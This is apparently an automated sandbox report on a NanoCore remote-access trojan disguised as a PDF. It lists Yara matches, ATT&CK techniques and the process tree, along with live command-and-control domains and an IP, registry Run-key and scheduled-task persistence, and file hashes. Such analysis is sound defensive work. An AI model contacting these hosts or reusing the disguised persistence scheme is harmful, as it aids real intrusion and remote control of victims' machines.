blyget_AssemblyCompilerGeneratedAttributeSettingsBaseSynchronizedEnvironmentSpecialFolderGetFolderPathPathCombineExceptionDirectoryDirectoryInfoCreateDirectoryFileStreamCreateProjectDataSetProjectErrorClearProjectErrorProcessGetCurrentProcessKillNanoProtectClient.Resources.resourcesDebuggableAttributeDebuggingModesCompilationRelaxationsAttributeRuntimeCompatibilityAttributeAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeNanoProtectClient.dlla[NanoProtect]: Checking for NanoProtect module..
Source: RegSvcs.exe, 00000013.00000002.462925300.0000000000D02000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: NanoCore.ClientPluginHost
Source: itugx.exe, 00000015.00000003.499747206.0000000001382000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: NanoCore.ClientPluginHost
Source: itugx.exe, 00000015.00000003.498827487.00000000013EB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: NanoCore.ClientPluginHost
Source: itugx.exe, 00000015.00000003.499159077.00000000013EE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: NanoCore.ClientPluginHost
Source: itugx.exe, 00000015.00000003.500004480.0000000003C6C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: NanoCore.ClientPluginHost
Source: itugx.exe, 00000015.00000003.500237895.00000000013B5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: NanoCore.ClientPluginHost
Source: itugx.exe, 00000017.00000003.519976244.0000000000D86000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: NanoCore.ClientPluginHost
Source: itugx.exe, 00000017.00000003.522419154.0000000000DBF000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: NanoCore.ClientPluginHost
Source: itugx.exe, 00000017.00000003.522729745.0000000000D52000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: NanoCore.ClientPluginHost
Source: itugx.exe, 00000017.00000003.520896058.0000000000DBB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: NanoCore.ClientPluginHost
Source: itugx.exe, 00000017.00000003.521795477.0000000000DEE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: NanoCore.ClientPluginHost
Source: itugx.exe, 00000017.00000003.523166921.0000000003588000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: NanoCore.ClientPluginHost
Source: itugx.exe, 00000017.00000003.523729347.0000000000D85000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: NanoCore.ClientPluginHost
Source: itugx.exe, 00000017.00000003.522501129.0000000000DDB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: NanoCore.ClientPluginHost
Source: itugx.exe, 00000019.00000003.543882986.00000000019ED000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: NanoCore.ClientPluginHost
Source: itugx.exe, 00000019.00000003.544675872.0000000004778000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: NanoCore.ClientPluginHost
Source: itugx.exe, 00000019.00000003.544569868.0000000001984000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: NanoCore.ClientPluginHost
Source: itugx.exe, 00000019.00000003.544269018.00000000019F0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: NanoCore.ClientPluginHost
Source: itugx.exe, 00000019.00000003.544903428.00000000019B7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: NanoCore.ClientPluginHost
Source: itugx.exe, 0000001C.00000003.573295191.0000000001405000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: NanoCore.ClientPluginHost
Source: itugx.exe, 0000001C.00000003.572597608.000000000143D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: NanoCore.ClientPluginHost
Source: itugx.exe, 0000001C.00000003.572853168.00000000013D2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: NanoCore.ClientPluginHost
Source: itugx.exe, 0000001C.00000003.572980994.0000000003F04000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: NanoCore.ClientPluginHost
Source: itugx.exe, 0000001C.00000003.572167005.000000000143B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: NanoCore.ClientPluginHost
Source: Yara match | File source: 28.3.itugx.exe.146edb8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.3.itugx.exe.15c6de8.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 19.2.RegSvcs.exe.41b560b.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 16.3.itugx.exe.1530ec0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 16.3.itugx.exe.1530ec0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 28.3.itugx.exe.146edb8.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.RegSvcs.exe.60b0000.7.unpack, type: UNPACKEDPE
Source: Yara match | File source: 21.3.itugx.exe.141ed90.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.3.itugx.exe.162fdf8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.3.itugx.exe.f085f0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 23.3.itugx.exe.deecc0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 23.3.itugx.exe.d85cb0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 21.3.itugx.exe.13b5d80.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 21.3.itugx.exe.13b5d80.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 16.3.itugx.exe.14c7eb0.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 16.3.itugx.exe.14c7eb0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 21.3.itugx.exe.13b5d80.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 23.3.itugx.exe.d85cb0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.3.itugx.exe.f71600.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 19.2.RegSvcs.exe.d00000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.3.itugx.exe.f085f0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 16.3.itugx.exe.1530ec0.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 25.3.itugx.exe.19b7de8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.3.itugx.exe.162fdf8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 21.3.itugx.exe.13b5d80.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 19.2.RegSvcs.exe.41bb041.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.3.itugx.exe.f085f0.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 16.3.itugx.exe.1530ec0.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.RegSvcs.exe.60b4629.6.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.RegSvcs.exe.60b0000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.3.itugx.exe.f71600.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 28.3.itugx.exe.1405da8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 16.3.itugx.exe.14c7eb0.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.3.itugx.exe.15c6de8.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.3.itugx.exe.f71600.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 25.3.itugx.exe.1a20df8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.3.itugx.exe.162fdf8.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 28.3.itugx.exe.1405da8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 23.3.itugx.exe.deecc0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.3.itugx.exe.162fdf8.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 23.3.itugx.exe.deecc0.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 25.3.itugx.exe.19b7de8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.3.itugx.exe.f71600.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 23.3.itugx.exe.d85cb0.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 16.3.itugx.exe.14c7eb0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 19.2.RegSvcs.exe.41bb041.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.3.itugx.exe.f085f0.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 28.3.itugx.exe.1405da8.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 23.3.itugx.exe.deecc0.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 23.3.itugx.exe.d85cb0.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.3.itugx.exe.15c6de8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.3.itugx.exe.15c6de8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 25.3.itugx.exe.1a20df8.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 28.3.itugx.exe.1405da8.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 21.3.itugx.exe.141ed90.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 19.2.RegSvcs.exe.41b07ce.5.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000010.00000003.455419127.0000000001530000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000010.00000003.455956530.000000000151D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.379717765.0000000000F09000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000003.445033484.0000000003E2F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000010.00000003.456804036.00000000014C7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000013.00000002.468974735.0000000004169000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000003.444608093.0000000001593000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000015.00000003.499747206.0000000001382000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000001C.00000003.573295191.0000000001405000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000003.445168798.00000000015C6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000001C.00000003.572597608.000000000143D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000019.00000003.544675872.0000000004778000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000019.00000003.543882986.00000000019ED000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000001C.00000003.572853168.00000000013D2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000015.00000003.498827487.00000000013EB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.585880095.00000000060B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000010.00000003.455090351.00000000014FD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.381511725.0000000000F08000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.381281377.0000000003813000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.580107208.0000000003781000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000003.442020848.00000000015C7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000010.00000003.454885906.00000000014C8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.379880100.0000000000F71000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000017.00000003.519976244.0000000000D86000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000015.00000003.499159077.00000000013EE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000019.00000003.544569868.0000000001984000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000015.00000003.500004480.0000000003C6C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000003.443014017.00000000015FF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000001C.00000003.572980994.0000000003F04000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000017.00000003.522419154.0000000000DBF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000010.00000003.456419289.0000000003AA0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000017.00000003.522729745.0000000000D52000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000010.00000003.456270575.0000000001494000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000003.442280554.00000000015FC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000019.00000003.544269018.00000000019F0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000015.00000003.500237895.00000000013B5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000013.00000002.462925300.0000000000D02000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000017.00000003.520896058.0000000000DBB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000017.00000003.521795477.0000000000DEE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.379756044.0000000000F3D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000017.00000003.523166921.0000000003588000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000003.443097060.000000000161A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000013.00000002.467749940.0000000003161000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000003.442615320.000000000162F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000010.00000003.455869267.0000000001501000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000019.00000003.544903428.00000000019B7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000001C.00000003.572167005.000000000143B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000017.00000003.523729347.0000000000D85000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.380269423.0000000000F40000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000017.00000003.522501129.0000000000DDB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.380361986.0000000000F5C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.380642798.0000000000ED4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: itugx.exe PID: 5920, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: itugx.exe PID: 3300, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: itugx.exe PID: 4036, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 4736, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: itugx.exe PID: 5928, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: itugx.exe PID: 5420, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: itugx.exe PID: 5552, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: itugx.exe PID: 1712, type: MEMORYSTR
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe | Code function: 2_2_00392163 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe | Code function: 2_2_00391B61 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,
MITRE ATT&CK matrix (one row per line, columns separated by "|", "-" for an empty cell; a number before a technique name is the count of matched signatures shown in the report):

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
2 Valid Accounts | 111 Scripting | 1 DLL Side-Loading | 1 Exploitation for Privilege Escalation | 11 Disable or Modify Tools | 31 Input Capture | 2 System Time Discovery | Remote Services | 11 Archive Collected Data | Exfiltration Over Other Network Medium | 1 Ingress Tool Transfer | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | 1 System Shutdown/Reboot
Default Accounts | 1 Native API | 2 Valid Accounts | 1 DLL Side-Loading | 11 Deobfuscate/Decode Files or Information | LSASS Memory | 1 Account Discovery | Remote Desktop Protocol | 31 Input Capture | Exfiltration Over Bluetooth | 1 Encrypted Channel | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts | 2 Command and Scripting Interpreter | 1 Scheduled Task/Job | 2 Valid Accounts | 111 Scripting | Security Account Manager | 4 File and Directory Discovery | SMB/Windows Admin Shares | 2 Clipboard Data | Automated Exfiltration | 1 Non-Standard Port | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | 1 Scheduled Task/Job | 21 Registry Run Keys / Startup Folder | 21 Access Token Manipulation | 12 Obfuscated Files or Information | NTDS | 36 System Information Discovery | Distributed Component Object Model | Input Capture | Scheduled Transfer | 1 Data Encoding | SIM Card Swap | - | Carrier Billing Fraud
Cloud Accounts | Cron | Network Logon Script | 312 Process Injection | 12 Software Packing | LSA Secrets | 341 Security Software Discovery | SSH | Keylogging | Data Transfer Size Limits | 1 Remote Access Software | Manipulate Device Communication | - | Manipulate App Store Rankings or Ratings
Replication Through Removable Media | Launchd | Rc.common | 1 Scheduled Task/Job | 1 DLL Side-Loading | Cached Domain Credentials | 121 Virtualization/Sandbox Evasion | VNC | GUI Input Capture | Exfiltration Over C2 Channel | 1 Non-Application Layer Protocol | Jamming or Denial of Service | - | Abuse Accessibility Features
External Remote Services | Scheduled Task | Startup Items | 21 Registry Run Keys / Startup Folder | 12 Masquerading | DCSync | 2 Process Discovery | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | 21 Application Layer Protocol | Rogue Wi-Fi Access Points | - | Data Encrypted for Impact
Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | 2 Valid Accounts | Proc Filesystem | 11 Application Window Discovery | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | - | Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | 121 Virtualization/Sandbox Evasion | /etc/passwd and /etc/shadow | 1 System Owner/User Discovery | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | - | Data Destruction
Supply Chain Compromise | AppleScript | At (Windows) | At (Windows) | 21 Access Token Manipulation | Network Sniffing | 1 Remote System Discovery | Taint Shared Content | Local Data Staging | Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol | File Transfer Protocols | - | - | Data Encrypted for Impact
Compromise Software Dependencies and Development Tools | Windows Command Shell | Cron | Cron | 312 Process Injection | Input Capture | Permission Groups Discovery | Replication Through Removable Media | Remote Data Staging | Exfiltration Over Physical Medium | Mail Protocols | - | - | Service Stop
Compromise Software Supply Chain | Unix Shell | Launchd | Launchd | 1 Hidden Files and Directories | Keylogging | Local Groups | Component Object Model and Distributed COM | Screen Capture | Exfiltration over USB | DNS | - | - | Inhibit System Recovery
Behavior Graph ID: 796783 | Sample: 026910003102350.pdf.scr.exe | Start date: 02/02/2023 | Architecture: WINDOWS | Score: 100

Top-level signatures: Multi AV Scanner detection for domain / URL; Malicious sample detected (through community Yara rule); Antivirus detection for URL or domain; 12 other signatures

Process tree recovered from the behavior graph (graph node numbers in parentheses):

• 026910003102350.pdf.scr.exe (10), started
  • dropped: C:\Users\user\AppData\Local\...\itugx.exe, PE32
  • signature: Starts an encoded Visual Basic Script (VBE)
  • starts wscript.exe (20)
    • starts itugx.exe (34)
      • dropped: C:\Users\user\AppData\Local\...\RegSvcs.exe, PE32
      • signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Found API chain indicative of sandbox detection; 3 other signatures
      • starts RegSvcs.exe (44)
        • DNS/IP: december2n.duckdns.org, 212.193.30.230, port 60705, SPD-NETTR, Russian Federation; december2nd.ddns.net; 192.168.2.1 (unknown)
        • dropped: C:\Program Files (x86)\...\dhcpmon.exe, PE32; C:\Users\user\AppData\Roaming\...\run.dat, data; C:\Users\user\AppData\Local\...\tmp897A.tmp, XML
        • signatures: Protects its processes via BreakOnTermination flag; Uses schtasks.exe or at.exe to add and modify task schedules; Hides that the sample has been downloaded from the Internet (zone.identifier)
        • starts schtasks.exe (49), which starts conhost.exe (53)
        • starts schtasks.exe (51), which starts conhost.exe (55)
• itugx.exe (14), started
  • signatures: Creates autostart registry keys with suspicious values (likely registry only malware); Creates multiple autostart registry keys
  • starts RegSvcs.exe (22)
• wscript.exe (16), started
  • starts itugx.exe (24), which starts RegSvcs.exe (38)
• 7 other processes (18)
  • itugx.exe (26), which starts RegSvcs.exe (40)
  • itugx.exe (28), which starts RegSvcs.exe (42)
  • conhost.exe (30)
  • 4 other processes (32)

Source | Detection | Scanner | Label
026910003102350.pdf.scr.exe | 46% | ReversingLabs | Win32.Trojan.Lisk
026910003102350.pdf.scr.exe | 46% | Virustotal | -

Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe | 100% | Avira | DR/AutoIt.Gen
C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe | 0% | ReversingLabs | -
C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe | 46% | ReversingLabs | Win32.Trojan.Generic
C:\Users\user\AppData\Local\Temp\RegSvcs.exe | 0% | ReversingLabs | -

Source | Detection | Scanner | Label
3.2.RegSvcs.exe.60b0000.7.unpack | 100% | Avira | TR/NanoCore.fadte
19.2.RegSvcs.exe.d00000.0.unpack | 100% | Avira | TR/Dropper.MSIL.Gen7

Source | Detection | Scanner | Label
december2nd.ddns.net | 12% | Virustotal | -
december2n.duckdns.org | 6% | Virustotal | -

Source | Detection | Scanner | Label
december2nd.ddns.net | 12% | Virustotal | -
december2n.duckdns.org | 6% | Virustotal | -
december2n.duckdns.org | 100% | Avira URL Cloud | malware
december2nd.ddns.net | 100% | Avira URL Cloud | malware
      NameIPActiveMaliciousAntivirus DetectionReputation
      december2nd.ddns.net
      212.193.30.230
      truetrueunknown
      december2n.duckdns.org
      212.193.30.230
      truetrueunknown
Name | Malicious | Antivirus Detection | Reputation
december2nd.ddns.net | true | 12%, Virustotal, Browse; Avira URL Cloud: malware | unknown
december2n.duckdns.org | true | 6%, Virustotal, Browse; Avira URL Cloud: malware | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
https://www.autoitscript.com/autoit3/ | 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.000000000739F000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | RegSvcs.exe, 00000003.00000002.580107208.0000000003781000.00000004.00000800.00020000.00000000.sdmp | false | | high
IP | Domain | Country | Flag | ASN | ASN Name | Malicious
212.193.30.230 | december2nd.ddns.net | Russian Federation | | 57844 | SPD-NETTR | true

IP
192.168.2.1
          Joe Sandbox Version:36.0.0 Rainbow Opal
          Analysis ID:796783
          Start date and time:2023-02-02 08:08:12 +01:00
          Joe Sandbox Product:CloudBasic
          Overall analysis duration:0h 13m 40s
          Hypervisor based Inspection enabled:false
          Report type:light
          Cookbook file name:default.jbs
          Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed:32
          Number of new started drivers analysed:0
          Number of existing processes analysed:0
          Number of existing drivers analysed:0
          Number of injected processes analysed:0
          Technologies:
          • HCA enabled
          • EGA enabled
          • HDC enabled
          • AMSI enabled
          Analysis Mode:default
          Analysis stop reason:Timeout
          Sample file name:026910003102350.pdf.scr.exe
          Detection:MAL
          Classification:mal100.troj.evad.winEXE@43/44@4/2
          EGA Information:
          • Successful, ratio: 100%
          HDC Information:
          • Successful, ratio: 99.7% (good quality ratio 92.3%)
          • Quality average: 78.7%
          • Quality standard deviation: 29.6%
          HCA Information:
          • Successful, ratio: 99%
          • Number of executed functions: 0
          • Number of non-executed functions: 0
          Cookbook Comments:
          • Found application associated with file extension: .exe
          • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, conhost.exe
          • Excluded domains from analysis (whitelisted): client.wns.windows.com, ctldl.windowsupdate.com
• Not all processes were analyzed, report is missing behavior information
          • Report creation exceeded maximum time and may have missing disassembly code information.
          • Report size exceeded maximum capacity and may have missing behavior information.
          • Report size exceeded maximum capacity and may have missing disassembly code.
          • Report size getting too big, too many NtOpenKeyEx calls found.
          • Report size getting too big, too many NtProtectVirtualMemory calls found.
          • Report size getting too big, too many NtQueryValueKey calls found.
          • Report size getting too big, too many NtSetInformationFile calls found.
Time | Type | Description
08:10:03 | Autostart | Run: HKLM\Software\Microsoft\Windows\CurrentVersion\Run Chrome C:\Users\user\AppData\Local\Temp\FOLDER~1\itugx.exe C:\Users\user\AppData\Local\Temp\FOLDER~1\rnnsh.xls
08:10:13 | Autostart | Run: HKLM\Software\Microsoft\Windows\CurrentVersion\Run AutoUpdate C:\Users\user\AppData\Local\Temp\FOLDER~1\Update.vbs
08:10:14 | Task Scheduler | Run new task: DHCP Monitor path: "C:\Users\user\AppData\Local\Temp\RegSvcs.exe" s>$(Arg0)
08:10:14 | API Interceptor | 602x Sleep call for process: RegSvcs.exe modified
08:10:15 | Task Scheduler | Run new task: DHCP Monitor Task path: "C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe" s>$(Arg0)
08:10:21 | Autostart | Run: HKLM\Software\Microsoft\Windows\CurrentVersion\Run DHCP Monitor C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
08:10:33 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Chrome C:\Users\user\AppData\Local\Temp\FOLDER~1\itugx.exe C:\Users\user\AppData\Local\Temp\FOLDER~1\rnnsh.xls
08:10:41 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run AutoUpdate C:\Users\user\AppData\Local\Temp\FOLDER~1\Update.vbs
08:10:56 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Chrome C:\Users\user\AppData\Local\Temp\FOLDER~1\itugx.exe C:\Users\user\AppData\Local\Temp\FOLDER~1\rnnsh.xls
08:11:04 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run AutoUpdate C:\Users\user\AppData\Local\Temp\FOLDER~1\Update.vbs
          Process:C:\Users\user\AppData\Local\Temp\RegSvcs.exe
          File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
          Category:dropped
          Size (bytes):45152
          Entropy (8bit):6.149629800481177
          Encrypted:false
          SSDEEP:768:bBbSoy+SdIBf0k2dsYyV6Iq87PiU9FViaLmf:EoOIBf0ddsYy8LUjVBC
          MD5:2867A3817C9245F7CF518524DFD18F28
          SHA1:D7BA2A111CEDD5BF523224B3F1CFE58EEC7C2FDC
          SHA-256:43026DCFF238F20CFF0419924486DEE45178119CFDD0D366B79D67D950A9BF50
          SHA-512:7D3D3DBB42B7966644D716AA9CBC75327B2ACB02E43C61F1DAD4AFE5521F9FE248B33347DFE15B637FB33EB97CDB322BCAEAE08BAE3F2FD863A9AD9B3A4D6B42
          Malicious:true
          Antivirus:
          • Antivirus: ReversingLabs, Detection: 0%
          Process:C:\Users\user\AppData\Local\Temp\RegSvcs.exe
          File Type:ASCII text, with CRLF line terminators
          Category:modified
          Size (bytes):142
          Entropy (8bit):5.090621108356562
          Encrypted:false
          SSDEEP:3:QHXMKa/xwwUC7WglAFXMWA2yTMGfsbNRLFS9Am12MFuAvOAsDeieVyn:Q3La/xwczlAFXMWTyAGCDLIP12MUAvvw
          MD5:8C0458BB9EA02D50565175E38D577E35
          SHA1:F0B50702CD6470F3C17D637908F83212FDBDB2F2
          SHA-256:C578E86DB701B9AFA3626E804CF434F9D32272FF59FB32FA9A51835E5A148B53
